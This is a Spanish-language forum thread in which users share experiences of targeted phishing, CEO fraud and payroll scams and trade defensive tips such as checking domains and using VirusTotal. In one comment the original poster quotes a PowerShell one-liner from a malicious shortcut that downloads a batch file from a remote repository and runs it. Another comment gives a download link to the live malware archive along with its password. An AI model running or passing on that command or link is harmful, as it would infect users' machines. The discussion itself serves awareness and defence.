Pero se debería prohibir por LEY el envio de e-mails sin firma digital válida.

Adiós Spam y adiós phising y timos por ingeniería social.

» autor: chavi

#43 Phising vivido en mis propias carnes

edgard72 — Sun, 08 Dec 2024 10:52:27 +0000

#17 y en GSuite, ¿cómo lo haces sin lector de correo externo? Más y más (grandes) empresas lo usan.

» autor: edgard72

#42 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 08:14:54 +0000

#41 Ah!!

Pues si que es segura vuestra infraestructura, si...

» autor: chavi

#41 Phising vivido en mis propias carnes

wildseven23 — Sun, 08 Dec 2024 08:09:06 +0000

#40 No, no, quien tenía acceso a todo era el director de RR.HH., creo que me he expresado mal

» autor: wildseven23

#40 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 08:06:49 +0000

#39 Si los datos no se guardan cifrados el responsable del CPD tiene acceso a absolutamente todo.

Ahora imagínate que el CPD es externo...

» autor: chavi

#39 Phising vivido en mis propias carnes

wildseven23 — Sun, 08 Dec 2024 07:34:52 +0000

#37 Al director de RR.HH. de mi antigua empresa le contactaron por mail con mogollón de información "fiable" (sacada de Linkedin, supongo), y terminó abriendo un "excel"... El resultado, más de un giga de información sobre la empresa, trabajadores, nóminas y demás mierdas.

Menos mal que el responsable del CPD se dio cuenta a tiempo, porque tenía acceso hasta a los repositorios de software (a saber por qué).

Todos estos datos, puesto que mi ex empresa se negó a pagar, terminaron publicados en la red TOR. Unos días de muchas risas y cachondeo, que concluyeron con el despido de esta persona.

» autor: wildseven23

#38 Phising vivido en mis propias carnes

Zarangollo — Sun, 08 Dec 2024 06:46:30 +0000

#28 si, se nota, además usan el mismo "puesto". Pero sin problema, el protocolo para esas cosas no es por email y consta de varias verificaciones adicionales.

» autor: Zarangollo

#37 Phising vivido en mis propias carnes

lorne_malvo — Sun, 08 Dec 2024 06:43:07 +0000

Un familiar estuvo muy cerca de liarla, con una variante del ataque al CEO. Suplantaron a una empresa cliente y se hicieron con los datos personales de toda su empresa. De hecho le llegó la llamada redireccionada desde la propia empresa. En líneas generales buscaban la firma del director financiero para realizar una transferencia. El timador conocía el nombre de sus hijos, colegio y sabía que estaba de vacaciones. Le salvo, una vez aportada la firma escaneada (que esto daría para bastante discusión), la insistencia para que hablara con el banco, presionando incluso con su posible despido. Y bueno en el corto plazo, tuvo que dejar la empresa por vergüenza, porque el tema cortó de raíz cualquier posible progresión.

» autor: lorne_malvo

#36 Phising vivido en mis propias carnes

wildseven23 — Sun, 08 Dec 2024 06:20:25 +0000

#35 Guay, ya nos contarás . Más que nada, por curiosidad.

» autor: wildseven23

#35 Phising vivido en mis propias carnes

Rogers77 — Sun, 08 Dec 2024 06:18:21 +0000

#31 gracias, lo cojo y lo investigamos;)

» autor: Rogers77

#34 Phising vivido en mis propias carnes

wildseven23 — Sun, 08 Dec 2024 06:07:40 +0000

#22 Pues, mira, también lo pensé, pero se parecía horrores a uno que esta empresa usaba y un socio me dijo que era correcto... Y acabo de darme cuenta que no. Era "correcto" porque tienen una redirección desde ese dominio a uno oficial.

Acabo de comprobar que el dominio se compró a finales del mes pasado, lo que, obviamente, descarta que sea un dominio oficial.

» autor: wildseven23

#33 Phising vivido en mis propias carnes

wildseven23 — Sun, 08 Dec 2024 05:59:31 +0000

#31 Me cuelgo de mí mismo. También había un lnk para ejecutar esto:

%windir%system32cmd.XXX /c powershell -Command "$h='https://gitlab.com/jjkjsad/khedc/-/raw/main/kjhsgdfww.bat'; $p=$env:TEMP+'Updates.bat'; iwr $h -OutFile $p;start $p"

He renombrado "cmd.exe" a "cmd.XXX" para que a nadie le dé por usarlo. En el archivo estaba bien escrito, claro. He visto el .bat al que apunta, pero está hecho en chino y no soy capaz de descubrir qué hace.

» autor: wildseven23

#32 Phising vivido en mis propias carnes

wildseven23 — Sun, 08 Dec 2024 05:53:49 +0000

#26 Pues no me había dado cuenta, pero el archivo descomprimido ocupa casi 1 giga, y VirusTotal solamente permite archivos de hasta 650Mb

No obstante, por si alguien tiene curiosidad, he dejado el enlace al bicho en #31.

» autor: wildseven23

#31 Phising vivido en mis propias carnes

wildseven23 — Sun, 08 Dec 2024 05:52:18 +0000

#20 Te dejo por aquí el enlace, por si a alguien le puede interar. ¡¡Ojo!! Es malware, si no sabéis qué hacéis (y menos si usáis Windows) no lo descarguéis.

www.transfernow.net/dl/20241208nSuRF57r

La contraseña es: meneame

» autor: wildseven23

#30 Phising vivido en mis propias carnes

calde — Sun, 08 Dec 2024 02:34:02 +0000

yo los que conozco son tan burdos que sólo con leer el email, o incluso viendo el remitente, ya es suficiente para tener claro que es un timo. Lo único jodido es que los recibo periódicamente y no sé cómo hacer que el mail reconozca que son una estafa, porque cambian el nombre y dirección del remitente en cada envío.

» autor: calde

#29 Phising vivido en mis propias carnes

MADMax2 — Sun, 08 Dec 2024 02:31:56 +0000

#25 ¿sólo?

» autor: MADMax2

#28 Phising vivido en mis propias carnes

MADMax2 — Sun, 08 Dec 2024 02:31:31 +0000

#21 Esa información la suelen sacar de linkedin.

Nos llegan muchos correos del estilo. La firma de esos correos son frases literales que tienen los suplantados en su linkedin

» autor: MADMax2

#27 Phising vivido en mis propias carnes

tableton — Sun, 08 Dec 2024 01:34:58 +0000

Teniendo en cuenta q se está llegando a suplantar incluso en llamadas de voz y videollamadas, llo que no falla es ponerte en contacto con la empresa o persona usando un teléfono o email publicados en la web de la empresa o q tú sepas q es 100% verificado. Siempre q está web no sea falsa también

» autor: tableton

#26 Phising vivido en mis propias carnes

--820898-- — Sat, 07 Dec 2024 23:40:42 +0000

[Usuario deshabilitado]

» autor: --820898--

#25 Phising vivido en mis propias carnes

santim123 — Sat, 07 Dec 2024 23:15:58 +0000

#22 Esa me la apunto. Recibo unos 3-4 intentos de timo al mes.

» autor: santim123

#24 Phising vivido en mis propias carnes

el_vago — Sat, 07 Dec 2024 23:08:49 +0000

#9 pareces ser un objetivo, por tu puesto y esas cosas. Recibirás phishing personalizado.

» autor: el_vago

#23 Phising vivido en mis propias carnes

carlesm — Sat, 07 Dec 2024 22:22:02 +0000

#14 Como no te contesta: The Princess Bride.

“You think this is a trap then?" the Count asked.
"I always think everything is a trap until proven otherwise," the Prince answered. "Which is why I'm still alive.”

» autor: carlesm

#22 Phising vivido en mis propias carnes

sillycon — Sat, 07 Dec 2024 21:31:37 +0000

Lo del dominio es muy sospechoso. Estás realmente seguro de que la URL era correcta? Hay ataques llamados homográficos donde se usan caracteres especiales con la misma forma que caracteres habituales para contratar dominios y suplantar al original.

» autor: sillycon

#21 Phising vivido en mis propias carnes

Zarangollo — Sat, 07 Dec 2024 21:28:53 +0000

En el correo del departamento de rrhh de mi empresa cada semana aparece un email solicitando el cambio de cuenta bancaria para las nóminas de algún empleado al azar de la empresa, con nombre y apellidos.

» autor: Zarangollo

#20 Phising vivido en mis propias carnes

Rogers77 — Sat, 07 Dec 2024 21:28:27 +0000

#9 me lo puedes pasar? Mándame un mensaje plis y hago análisis de quién está detrás.

» autor: Rogers77

#19 Phising vivido en mis propias carnes

Perico12 — Sat, 07 Dec 2024 21:24:32 +0000

Gracias por el aviso.

» autor: Perico12

#18 Phising vivido en mis propias carnes

victorjba — Sat, 07 Dec 2024 21:21:23 +0000

#16 Yo solo me acuerdo de lo típico, "Soy Íñigo Montoya y me vas a comer la p..." o algo así

» autor: victorjba

#17 Phising vivido en mis propias carnes

chavi — Sat, 07 Dec 2024 21:17:11 +0000

Eso se acaba eliminando la posibilidad de enviar correos sin firma digital.

O se firma con una clave privada válida (con su pública correspondiente certificada), o no se envía el email.

En España es coste-0. Ya hemos gastado la pasta en el DNIe que nadie usa.

» autor: chavi

#16 Phising vivido en mis propias carnes

shinjikari — Sat, 07 Dec 2024 18:28:04 +0000

#15 ¡No me acordaba de esa escena! Gracias

» autor: shinjikari

#15 Phising vivido en mis propias carnes

hijolagranputa — Sat, 07 Dec 2024 17:16:34 +0000

#14 De la princesa prometida. Se lo dice el príncipe Humperdinck al tipo que tenia 6 dedos en una mano.

» autor: hijolagranputa

#14 Phising vivido en mis propias carnes

shinjikari — Sat, 07 Dec 2024 15:38:16 +0000

#4 Este año me ha tocado lidiar con dos casos de suplantación en los que SPF y DKIM estaban OK. En el primero cayeron y 5.000€ menos en la empresa Credenciales robadas desde un equipo al que se accedía al correo y no estaba en el entorno controlado (dominio).

Cada día pinta peor.

#13 ¿De que peli es?

» autor: shinjikari

#13 Phising vivido en mis propias carnes

hijolagranputa — Sat, 07 Dec 2024 13:48:25 +0000

"Siempre pienso que todo es una trampa; por eso sigo con vida".

Tengo el fotograma de la peli con la frase debajo y se la envío de vuelta cuando alguna empresa manda un correo a la mía avisando de que no abran sus mensajes porque han sido víctimas y tal y tal.

El sentido común te ayuda con estas mierdas, pero desgraciadamente también es el menos común de los sentidos.

» autor: hijolagranputa

#12 Phising vivido en mis propias carnes

eldios13 — Sat, 07 Dec 2024 11:42:31 +0000

#3 la parte de "escrito como el culo" dejaría de ser la forma más fácil de pillar las estafas ..

» autor: eldios13

#11 Phising vivido en mis propias carnes

ochoceros — Sat, 07 Dec 2024 10:05:23 +0000

#9 Pues coméntalo en tu empresa/entorno porque eso quiere decir que hay alguien con una brecha en su sistema.

Probablemente fue en la empresa a la que avisaste y ellos pongan medidas, pero hay que andar con mil ojos porque hoy en día con la IA pueden hasta suplantar a alguien con voz en una llamada telefónica si tienen el control remoto de su sistema, tipo "hola, soy X y acabo de recibir tu email" y te llaman desde un móvil con el CallerId modificado para que aparezcan como tú contacto. Pero esto también es fundamental para saber y depurar el sitio y alcance de la intrusión. A veces acceden/infectan un móvil, otras un ordenador, otras un servidor de email... Con la IA y el datamining de datos robados se está llevando el ataque por ingeniería social a unas cotas de asustar.

» autor: ochoceros

#10 Phising vivido en mis propias carnes

EISev — Sat, 07 Dec 2024 09:18:37 +0000

#6 a mí estando en paro, en medio de la pandemia y en un montón de procesos online, me intentaron timar con una oferta falsa de trabajo construida a partir de mi propio CV y mezclando cosas de distintos empleos previos.

Les pillé porque había un par de frases que copiaron literalmente pero eso con la IA será mucho más difícil de detectar, y porque el número tenía rastro en Google de otras estafas, que eso también lo irán perfeccionando...

» autor: EISev

#9 Phising vivido en mis propias carnes

wildseven23 — Sat, 07 Dec 2024 06:59:37 +0000

#7 Es que no era ni necesario el análisis. Como cuento, ni siquiera necesité decriptar el archivo comprimido, simplemente ver el nombre y las extensiones de lo que contenía.

No puedo asegurar que fuesen directamente a por mí, puede ser casualidad, pero que supiesen que yo hacía uso de sus productos y que conociesen además a qué me dedicaba profesionalmente, me hace pensar.

» autor: wildseven23

#8 Phising vivido en mis propias carnes

HeilHynkel — Fri, 06 Dec 2024 16:29:35 +0000

#2

Pues seguramente, antes iban un poco aleatorios, pero con un buen análisis de IA pueden acertar en los timos mucho más.

» autor: HeilHynkel

#7 Phising vivido en mis propias carnes

ochoceros — Fri, 06 Dec 2024 14:12:14 +0000

"protegido con contraseña"

Eso es una red flag de libro, el método más usado para proteger archivos maliciosos de escaneos de antivirus de los proveedores de alojamiento en la nube.

Una cosa que deberías hacer en este caso es subir el(los) archivo(s) descomprimido(s) (o comprimidos SIN contraseña) a VirusTotal y ver qué es lo que te cuenta el análisis.

» autor: ochoceros

#6 Phising vivido en mis propias carnes

celyo — Fri, 06 Dec 2024 13:27:42 +0000

Yo ya tras una experiencia, que me salvo por ser algo desconfiado, ya desconfio de todo y prefiero llamar en caso antes de hacer nada.

A mi me pilló con la guardia baja de estar currando pensando en otras historias, llamarme y tratar de ser amable, hasta que me pedía datos para contratar algo y ya le dije que no.

Lo malo fue que me dijeron mi nombr con apellidos, mi dirección real. Me sonsacaron el dni, eso fue malo.
Pero la cosa se quedó ahí.
Fui asustado a la poli, pero sin nada más, no hicieron nada.

Asi que ahora a ser seco y cortante, y si algo me interesa ya preguntaré en la tienda o emprrsa de turno via oficial.

Como ya lei por aquí una vez, asumo siempre que tienen mis datos, asi que confianza 0

» autor: celyo

#5 Phising vivido en mis propias carnes

johel — Fri, 06 Dec 2024 13:18:28 +0000

#4 Cuando no estan usando directamente las cuentas corporativas de la empresa de rango X, a las que han conseguido acceso, para intentar escalar hacia objetivos mas interesantes.
Es muy tipico que se hagan con la cuenta de secretaria de una empresa mediana que no es el objetivo para saltar a la cuenta de un empleado digamos de contabilidad y de ese empleado saltar hacia datos de grandes clientes. Durante todo ese proceso intermedio ni siquiera estan usando ningun tipo de hacking, estan dentro con datos autenticos robados.

» autor: johel

#4 Phising vivido en mis propias carnes

AMDK6III — Fri, 06 Dec 2024 12:30:57 +0000

Ya ni DMARC ni DKIM ni po**as .
Los atacantes usan cuentas email corporativas con credenciales pwneadas . (y que no llevan 2FA).

» autor: AMDK6III

#3 Phising vivido en mis propias carnes

StarlightHunter.com — Fri, 06 Dec 2024 11:29:26 +0000

#2 Hay que ir acostumbrándose. Cada vez los engaños serán más sofisticados, y con la IA generativa se van a poner más peludas aún las cosas.

» autor: StarlightHunter.com

#2 Phising vivido en mis propias carnes

wildseven23 — Fri, 06 Dec 2024 10:47:24 +0000

#1 Tal cual. Pero con el auge de la IA, no me extrañaría que hayan buscando un perfil parecido al mío, que usa sus productos habitualmente (por ahí corren fotos mías con los mismos), para urdir el engaño.

» autor: wildseven23

#1 Phising vivido en mis propias carnes

HeilHynkel — Fri, 06 Dec 2024 10:44:51 +0000

Tengo la suerte de ser una persona desconfiada y con conocimientos informáticos superiores a la media,

Como debe ser. Aquí no hay que fiarse de nadie.

» autor: HeilHynkel